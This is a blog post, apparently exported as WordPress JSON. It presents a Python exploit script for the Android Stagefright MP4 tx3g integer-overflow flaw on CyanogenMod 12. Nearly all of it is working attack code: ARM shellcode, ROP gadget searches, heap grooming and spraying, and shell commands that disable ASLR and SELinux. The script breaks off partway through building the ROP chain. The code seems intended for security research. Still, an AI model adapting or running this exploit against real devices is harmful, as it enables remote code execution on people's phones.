{"id":28285,"date":"2017-04-08T00:54:14","date_gmt":"2017-04-07T17:54:14","guid":{"rendered":"http:\/\/deepquest.code511.com\/blog\/?p=28285"},"modified":"2017-04-08T00:54:14","modified_gmt":"2017-04-07T17:54:14","slug":"cyanogenmod-12-stagefright-mp4-tx3g-integer-overflow-remote-code-execution-exploit","status":"publish","type":"post","link":"https:\/\/deepquest.code511.com\/blog\/2017\/04\/cyanogenmod-12-stagefright-mp4-tx3g-integer-overflow-remote-code-execution-exploit\/","title":{"rendered":"CyanogenMod 12 Stagefright (.MP4 tx3g Integer Overflow) Remote Code Execution Exploit"},"content":{"rendered":"

There\u2019s been a lot of attention recently around a number of vulnerabilities in Android\u2019s libstagefright. There\u2019s been a lot of confusion about the remote exploitability of the issues, especially on modern devices. In this blog post we will demonstrate an exploit on\u00a0CyanogenMod 12.<\/p>\n

<\/p>\n

#!\/usr\/bin\/python2<\/code><\/div>\n
#<\/code><\/div>\n
# CyanogenMod 12 Stagefright (.MP4 tx3g Integer Overflow) Exploit Remote Code Execution<\/code><\/div>\n
# Author: Marcin Kozlowski (marcinguy@gmail.com)<\/code><\/div>\n
# Based on: https:\/\/googleprojectzero.blogspot.com\/2015\/09\/stagefrightened.html<\/a><\/code><\/div>\n
#<\/code><\/div>\n
# On CyanogenMod make sure your ROM is compiled to use jemalloc (not dlmalloc). With dlmalloc I wasnt able to exploit this. vtable was very far away, actually before the buffer. How to overwrite it ? :\/<\/code><\/div>\n
# cat device\/samsung\/msm8226-common\/BoardConfigCommon.mk<\/code><\/div>\n
##Memory<\/code><\/div>\n
##MALLOC_IMPL := dlmalloc<\/code><\/div>\n
#MALLOC_IMPL := jemalloc<\/code><\/div>\n
#<\/code><\/div>\n
# In my tests, I disabled ASLR and SELinux, the second one must be disabled for it to work, seems like mediaserver process is sandboxed, the first make it easier to exploit (no need to guess libc_base). Heap has to be alligned as predicted, pssh at 0xb0503000 (Should happen after you run the exploit for few minutes). May need adjustment for you mobile.<\/code><\/div>\n
# echo 0 > \/proc\/sys\/kernel\/randomize_va_space<\/code><\/div>\n
# echo 0 > \/sys\/fs\/selinux\/enforce<\/code><\/div>\n
#<\/code><\/div>\n
# vtable offset was different than in G0 exploit, also the Heap was sprayed differently in this exploit version.<\/code><\/div>\n
#\u00a0 <\/code><\/div>\n
# Gadget pop {r0, r1, r2, r3, pc} was not in my standard CyanogenMod build for my mobile, so I built it into \/system\/lib\/libc.so, not to spend too much time on ROP Stack<\/code><\/div>\n
#<\/code><\/div>\n
#<\/code><\/div>\n
# Tested on Samsung Galaxy S3 Neo+ GT-I9301I <\/code><\/div>\n
#<\/code><\/div>\n
# root@s3ve3g:\/ # ls \/root<\/code><\/div>\n
# pwned<\/code><\/div>\n
# root@s3ve3g:\/ # <\/code><\/div>\n
#<\/code><\/div>\n
# Provided for legal security research and testing purposes ONLY<\/code><\/div>\n
\u00a0<\/code><\/div>\n
import<\/code> cherrypy<\/code><\/div>\n
import<\/code> os<\/code><\/div>\n
import<\/code> pwnlib.asm as asm<\/code><\/div>\n
import<\/code> pwnlib.elf as elf<\/code><\/div>\n
import<\/code> sys<\/code><\/div>\n
import<\/code> struct<\/code><\/div>\n
\u00a0<\/code><\/div>\n
<\/div>\n
#<\/code><\/div>\n
#PoC Shellcode. Create \/root\/pwned file on mobile<\/code><\/div>\n
#<\/code><\/div>\n
#Make sure \/root is writeable by media user or all (chmod 777 \/root)<\/code><\/div>\n
<\/div>\n
shellcode <\/code>=<\/code> bytearray(<\/code>\"\\x01\\x60\\x8f\\xe2\"<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>\"\\x16\\xff\\x2f\\xe1\"<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>\"\\x78\\x46\"<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>\"\\x10\\x30\"<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>\"\\xff\\x21\"<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>\"\\xff\\x31\"<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>\"\\x01\\x31\"<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>\"\\x08\\x27\"<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>\"\\x01\\xdf\"<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>\"\\x40\\x40\"<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>\"\\x01\\x27\"<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>\"\\x01\\xdf\"<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>\"\\x2f\\x72\\x6f\\x6f\"<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>\"\\x74\\x2f\\x70\\x77\"<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>\"\\x6e\\x65\"<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>\"\\x64\"<\/code>)<\/code><\/div>\n
<\/div>\n
print<\/code> \"Shellcode length:\"<\/code>+<\/code>str<\/code>(<\/code>len<\/code>(shellcode))<\/code><\/div>\n
\u00a0<\/code><\/div>\n
while<\/code> len<\/code>(shellcode) <\/code>%<\/code> 4<\/code> !<\/code>=<\/code> 0<\/code>:<\/code><\/div>\n
\u00a0\u00a0<\/code>shellcode <\/code>+<\/code>=<\/code> '\\x00'<\/code><\/div>\n
\u00a0<\/code><\/div>\n
# heap grooming configuration<\/code><\/div>\n
alloc_size <\/code>=<\/code> 0x20<\/code><\/div>\n
groom_count <\/code>=<\/code> 0x4<\/code><\/div>\n
spray_size <\/code>=<\/code> 0x100000<\/code><\/div>\n
spray_count <\/code>=<\/code> 0x10<\/code><\/div>\n
\u00a0<\/code><\/div>\n
# address of the buffer we allocate for our shellcode<\/code><\/div>\n
mmap_address <\/code>=<\/code> 0x90000000<\/code><\/div>\n
\u00a0<\/code><\/div>\n
# addresses that we need to predict<\/code><\/div>\n
libc_base <\/code>=<\/code> 0xb6ef5000<\/code><\/div>\n
spray_address <\/code>=<\/code> 0xb0503000<\/code><\/div>\n
\u00a0<\/code><\/div>\n
# ROP gadget addresses<\/code><\/div>\n
stack_pivot <\/code>=<\/code> None<\/code><\/div>\n
stack_pivot1 <\/code>=<\/code> None<\/code><\/div>\n
pop_pc <\/code>=<\/code> None<\/code><\/div>\n
pop_r0_r1_r2_r3_pc <\/code>=<\/code> None<\/code><\/div>\n
pop_r4_r5_r6_r7_pc <\/code>=<\/code> None<\/code><\/div>\n
ldr_lr_bx_lr <\/code>=<\/code> None<\/code><\/div>\n
ldr_lr_bx_lr_stack_pad <\/code>=<\/code> 0<\/code><\/div>\n
mmap64 <\/code>=<\/code> None<\/code><\/div>\n
memcpy <\/code>=<\/code> None<\/code><\/div>\n
\u00a0<\/code><\/div>\n
def<\/code> find_arm_gadget(e, gadget):<\/code><\/div>\n
\u00a0\u00a0<\/code>gadget_bytes <\/code>=<\/code> asm.asm(gadget, arch<\/code>=<\/code>'arm'<\/code>)<\/code><\/div>\n
\u00a0\u00a0<\/code>gadget_address <\/code>=<\/code> None<\/code><\/div>\n
\u00a0\u00a0<\/code>for<\/code> address <\/code>in<\/code> e.search(gadget_bytes):<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>if<\/code> address <\/code>%<\/code> 4<\/code> =<\/code>=<\/code> 0<\/code>:<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>gadget_address <\/code>=<\/code> address<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>if<\/code> gadget_bytes <\/code>=<\/code>=<\/code> e.read(gadget_address, <\/code>len<\/code>(gadget_bytes)):<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>print<\/code> asm.disasm(gadget_bytes, vma<\/code>=<\/code>gadget_address, arch<\/code>=<\/code>'arm'<\/code>)<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>break<\/code><\/div>\n
\u00a0\u00a0<\/code>return<\/code> gadget_address<\/code><\/div>\n
\u00a0<\/code><\/div>\n
def<\/code> find_thumb_gadget(e, gadget):<\/code><\/div>\n
\u00a0\u00a0<\/code>gadget_bytes <\/code>=<\/code> asm.asm(gadget, arch<\/code>=<\/code>'thumb'<\/code>)<\/code><\/div>\n
\u00a0\u00a0<\/code>gadget_address <\/code>=<\/code> None<\/code><\/div>\n
\u00a0\u00a0<\/code>for<\/code> address <\/code>in<\/code> e.search(gadget_bytes):<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>if<\/code> address <\/code>%<\/code> 2<\/code> =<\/code>=<\/code> 0<\/code>:<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>gadget_address <\/code>=<\/code> address <\/code>+<\/code> 1<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>if<\/code> gadget_bytes <\/code>=<\/code>=<\/code> e.read(gadget_address <\/code>-<\/code> 1<\/code>, <\/code>len<\/code>(gadget_bytes)):<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>print<\/code> asm.disasm(gadget_bytes, vma<\/code>=<\/code>gadget_address<\/code>-<\/code>1<\/code>, arch<\/code>=<\/code>'thumb'<\/code>)<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>break<\/code><\/div>\n
\u00a0\u00a0<\/code>return<\/code> gadget_address<\/code><\/div>\n
\u00a0\u00a0\u00a0<\/code><\/div>\n
def<\/code> find_gadget(e, gadget):<\/code><\/div>\n
\u00a0\u00a0<\/code>gadget_address <\/code>=<\/code> find_thumb_gadget(e, gadget)<\/code><\/div>\n
\u00a0\u00a0<\/code>if<\/code> gadget_address <\/code>is<\/code> not<\/code> None<\/code>:<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>return<\/code> gadget_address<\/code><\/div>\n
\u00a0\u00a0<\/code>return<\/code> find_arm_gadget(e, gadget)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
def<\/code> find_rop_gadgets(path):<\/code><\/div>\n
\u00a0\u00a0<\/code>global<\/code> memcpy<\/code><\/div>\n
\u00a0\u00a0<\/code>global<\/code> mmap64<\/code><\/div>\n
\u00a0\u00a0<\/code>global<\/code> stack_pivot<\/code><\/div>\n
\u00a0\u00a0<\/code>global<\/code> stack_pivot1<\/code><\/div>\n
\u00a0\u00a0<\/code>global<\/code> pop_pc<\/code><\/div>\n
\u00a0\u00a0<\/code>global<\/code> pop_r0_r1_r2_r3_pc<\/code><\/div>\n
\u00a0\u00a0<\/code>global<\/code> pop_r4_r5_r6_r7_pc<\/code><\/div>\n
\u00a0\u00a0<\/code>global<\/code> ldr_lr_bx_lr<\/code><\/div>\n
\u00a0\u00a0<\/code>global<\/code> ldr_lr_bx_lr_stack_pad<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>e <\/code>=<\/code> elf.ELF(path)<\/code><\/div>\n
\u00a0\u00a0<\/code>e.address <\/code>=<\/code> libc_base<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>memcpy <\/code>=<\/code> e.symbols[<\/code>'memcpy'<\/code>]<\/code><\/div>\n
\u00a0\u00a0<\/code>print<\/code> '[*] memcpy : 0x{:08x}'<\/code>.<\/code>format<\/code>(memcpy)<\/code><\/div>\n
\u00a0\u00a0<\/code>mmap64 <\/code>=<\/code> e.symbols[<\/code>'mmap64'<\/code>]<\/code><\/div>\n
\u00a0\u00a0<\/code>print<\/code> '[*] mmap64 : 0x{:08x}'<\/code>.<\/code>format<\/code>(mmap64)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># .text:00013344\u00a0\u00a0\u00a0 ADD\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 R2, R0, #0x4C<\/code><\/div>\n
\u00a0\u00a0<\/code># .text:00013348\u00a0\u00a0\u00a0 LDMIA\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 R2, {R4-LR}<\/code><\/div>\n
\u00a0\u00a0<\/code># .text:0001334C\u00a0\u00a0\u00a0 TEQ\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 SP, #0<\/code><\/div>\n
\u00a0\u00a0<\/code># .text:00013350\u00a0\u00a0\u00a0 TEQNE\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 LR, #0<\/code><\/div>\n
\u00a0\u00a0<\/code># .text:00013354\u00a0\u00a0\u00a0 BEQ\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 botch_0<\/code><\/div>\n
\u00a0\u00a0<\/code># .text:00013358\u00a0\u00a0\u00a0 MOV\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 R0, R1<\/code><\/div>\n
\u00a0\u00a0<\/code># .text:0001335C\u00a0\u00a0\u00a0 TEQ\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 R0, #0<\/code><\/div>\n
\u00a0\u00a0<\/code># .text:00013360\u00a0\u00a0\u00a0 MOVEQ\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 R0, #1<\/code><\/div>\n
\u00a0\u00a0<\/code># .text:00013364\u00a0\u00a0\u00a0 BX\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 LR<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>pivot_asm <\/code>=<\/code> ''<\/code><\/div>\n
\u00a0\u00a0<\/code>pivot_asm <\/code>+<\/code>=<\/code> 'add\u00a0\u00a0 r2, r0, #0x4c\\n'<\/code><\/div>\n
\u00a0\u00a0<\/code>pivot_asm <\/code>+<\/code>=<\/code> 'ldmia r2, {r4 - lr}\\n'<\/code><\/div>\n
\u00a0\u00a0<\/code>pivot_asm <\/code>+<\/code>=<\/code> 'teq\u00a0\u00a0 sp, #0\\n'<\/code><\/div>\n
\u00a0\u00a0<\/code>pivot_asm <\/code>+<\/code>=<\/code> 'teqne lr, #0'<\/code><\/div>\n
\u00a0\u00a0<\/code>stack_pivot <\/code>=<\/code> find_arm_gadget(e, pivot_asm)<\/code><\/div>\n
\u00a0\u00a0<\/code>print<\/code> '[*] stack_pivot : 0x{:08x}'<\/code>.<\/code>format<\/code>(stack_pivot)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>pop_pc_asm <\/code>=<\/code> 'pop {pc}'<\/code><\/div>\n
\u00a0\u00a0<\/code>pop_pc <\/code>=<\/code> find_gadget(e, pop_pc_asm)<\/code><\/div>\n
\u00a0\u00a0<\/code>print<\/code> '[*] pop_pc : 0x{:08x}'<\/code>.<\/code>format<\/code>(pop_pc)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>pop_r0_r1_r2_r3_pc <\/code>=<\/code> find_gadget(e, <\/code>'pop {r0, r1, r2, r3, pc}'<\/code>)<\/code><\/div>\n
\u00a0\u00a0<\/code>print<\/code> '[*] pop_r0_r1_r2_r3_pc : 0x{:08x}'<\/code>.<\/code>format<\/code>(pop_r0_r1_r2_r3_pc)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>pop_r4_r5_r6_r7_pc <\/code>=<\/code> find_gadget(e, <\/code>'pop {r4, r5, r6, r7, pc}'<\/code>)<\/code><\/div>\n
\u00a0\u00a0<\/code>print<\/code> '[*] pop_r4_r5_r6_r7_pc : 0x{:08x}'<\/code>.<\/code>format<\/code>(pop_r4_r5_r6_r7_pc)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>ldr_lr_bx_lr_stack_pad <\/code>=<\/code> 0<\/code><\/div>\n
\u00a0\u00a0<\/code>for<\/code> i <\/code>in<\/code> range<\/code>(<\/code>0<\/code>, <\/code>0x100<\/code>, <\/code>4<\/code>):<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>ldr_lr_bx_lr_asm <\/code>=<\/code>\u00a0 'ldr lr, [sp, #0x{:08x}]\\n'<\/code>.<\/code>format<\/code>(i)<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>ldr_lr_bx_lr_asm <\/code>+<\/code>=<\/code> 'add sp, sp, #0x{:08x}\\n'<\/code>.<\/code>format<\/code>(i <\/code>+<\/code> 8<\/code>)<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>ldr_lr_bx_lr_asm <\/code>+<\/code>=<\/code> 'bx\u00a0 lr'<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>ldr_lr_bx_lr <\/code>=<\/code> find_gadget(e, ldr_lr_bx_lr_asm)<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>if<\/code> ldr_lr_bx_lr <\/code>is<\/code> not<\/code> None<\/code>:<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>ldr_lr_bx_lr_stack_pad <\/code>=<\/code> i<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/code>break<\/code><\/div>\n
\u00a0\u00a0\u00a0<\/code><\/div>\n
def<\/code> pad(size):<\/code><\/div>\n
\u00a0\u00a0<\/code>return<\/code> '#'<\/code> *<\/code> size<\/code><\/div>\n
\u00a0<\/code><\/div>\n
def<\/code> pb32(val):<\/code><\/div>\n
\u00a0\u00a0<\/code>return<\/code> struct.pack(<\/code>\">I\"<\/code>, val)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
def<\/code> pb64(val):<\/code><\/div>\n
\u00a0\u00a0<\/code>return<\/code> struct.pack(<\/code>\">Q\"<\/code>, val)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
def<\/code> p32(val):<\/code><\/div>\n
\u00a0\u00a0<\/code>return<\/code> struct.pack(<\/code>\"<I\"<\/code>, val)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
def<\/code> p64(val):<\/code><\/div>\n
\u00a0\u00a0<\/code>return<\/code> struct.pack(<\/code>\"<Q\"<\/code>, val)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
def<\/code> chunk(tag, data, length<\/code>=<\/code>0<\/code>):<\/code><\/div>\n
\u00a0\u00a0<\/code>if<\/code> length <\/code>=<\/code>=<\/code> 0<\/code>:<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>length <\/code>=<\/code> len<\/code>(data) <\/code>+<\/code> 8<\/code><\/div>\n
\u00a0\u00a0<\/code>if<\/code> length > <\/code>0xffffffff<\/code>:<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>return<\/code> pb32(<\/code>1<\/code>) <\/code>+<\/code> tag <\/code>+<\/code> pb64(length)<\/code>+<\/code> data<\/code><\/div>\n
\u00a0\u00a0<\/code>return<\/code> pb32(length) <\/code>+<\/code> tag <\/code>+<\/code> data<\/code><\/div>\n
\u00a0<\/code><\/div>\n
def<\/code> alloc_avcc(size):<\/code><\/div>\n
\u00a0\u00a0<\/code>avcc <\/code>=<\/code> 'A'<\/code> *<\/code> size<\/code><\/div>\n
\u00a0\u00a0<\/code>return<\/code> chunk(<\/code>'avcC'<\/code>, avcc)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
def<\/code> alloc_hvcc(size):<\/code><\/div>\n
\u00a0\u00a0<\/code>hvcc <\/code>=<\/code> 'H'<\/code> *<\/code> size<\/code><\/div>\n
\u00a0\u00a0<\/code>return<\/code> chunk(<\/code>'hvcC'<\/code>, hvcc)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
def<\/code> sample_table(data):<\/code><\/div>\n
\u00a0\u00a0<\/code>stbl <\/code>=<\/code> ''<\/code><\/div>\n
\u00a0\u00a0<\/code>stbl <\/code>+<\/code>=<\/code> chunk(<\/code>'stco'<\/code>, <\/code>'\\x00'<\/code> *<\/code> 8<\/code>)<\/code><\/div>\n
\u00a0\u00a0<\/code>stbl <\/code>+<\/code>=<\/code> chunk(<\/code>'stsc'<\/code>, <\/code>'\\x00'<\/code> *<\/code> 8<\/code>)<\/code><\/div>\n
\u00a0\u00a0<\/code>stbl <\/code>+<\/code>=<\/code> chunk(<\/code>'stsz'<\/code>, <\/code>'\\x00'<\/code> *<\/code> 12<\/code>)<\/code><\/div>\n
\u00a0\u00a0<\/code>stbl <\/code>+<\/code>=<\/code> chunk(<\/code>'stts'<\/code>, <\/code>'\\x00'<\/code> *<\/code> 8<\/code>)<\/code><\/div>\n
\u00a0\u00a0<\/code>stbl <\/code>+<\/code>=<\/code> data<\/code><\/div>\n
\u00a0\u00a0<\/code>return<\/code> chunk(<\/code>'stbl'<\/code>, stbl)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
def<\/code> memory_leak(size):<\/code><\/div>\n
\u00a0\u00a0<\/code>pssh <\/code>=<\/code> 'leak'<\/code><\/div>\n
\u00a0\u00a0<\/code>pssh <\/code>+<\/code>=<\/code> 'L'<\/code> *<\/code> 16<\/code><\/div>\n
\u00a0\u00a0<\/code>pssh <\/code>+<\/code>=<\/code> pb32(size)<\/code><\/div>\n
\u00a0\u00a0<\/code>pssh <\/code>+<\/code>=<\/code> 'L'<\/code> *<\/code> size<\/code><\/div>\n
\u00a0\u00a0<\/code>return<\/code> chunk(<\/code>'pssh'<\/code>, pssh)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
def<\/code> heap_spray(size):<\/code><\/div>\n
\u00a0\u00a0<\/code>pssh <\/code>=<\/code> 'spry'<\/code><\/div>\n
\u00a0\u00a0<\/code>pssh <\/code>+<\/code>=<\/code> 'S'<\/code> *<\/code> 16<\/code><\/div>\n
\u00a0\u00a0<\/code>pssh <\/code>+<\/code>=<\/code> pb32(size)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>=<\/code> ''<\/code><\/div>\n
\u00a0\u00a0\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>nop <\/code>=<\/code> asm.asm(<\/code>'nop'<\/code>, arch<\/code>=<\/code>'thumb'<\/code>)<\/code><\/div>\n
\u00a0\u00a0<\/code>while<\/code> len<\/code>(page) < <\/code>28<\/code>:<\/code><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> nop<\/code><\/div>\n
\u00a0\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(stack_pivot) <\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(pop_r0_r1_r2_r3_pc)<\/code><\/div>\n
<\/div>\n
\u00a0<\/code><\/div>\n
<\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code># mmap64(mmap_address, <\/code><\/div>\n
\u00a0\u00a0<\/code>#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 0x1000,<\/code><\/div>\n
\u00a0\u00a0<\/code>#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 PROT_READ | PROT_WRITE | PROT_EXECUTE,<\/code><\/div>\n
\u00a0\u00a0<\/code>#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS,<\/code><\/div>\n
\u00a0\u00a0<\/code>#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 -1,<\/code><\/div>\n
\u00a0\u00a0<\/code>#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 0);<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(mmap_address)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r0 = address<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0x1000<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r1 = size<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>7<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r2 = protection<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0x32<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r3 = flags<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(ldr_lr_bx_lr)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># pc<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> pad(ldr_lr_bx_lr_stack_pad)<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(pop_r4_r5_r6_r7_pc)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># lr<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> pad(<\/code>4<\/code>)<\/code><\/div>\n
\u00a0<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0x44444444<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r4<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0x55555555<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r5<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0x66666666<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r6<\/code><\/div>\n
\u00a0\u00a0<\/code>page <\/code>+<\/code>=<\/code> p32(<\/code>0x77777777<\/code>)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/code># r7<\/code><\/div>\n
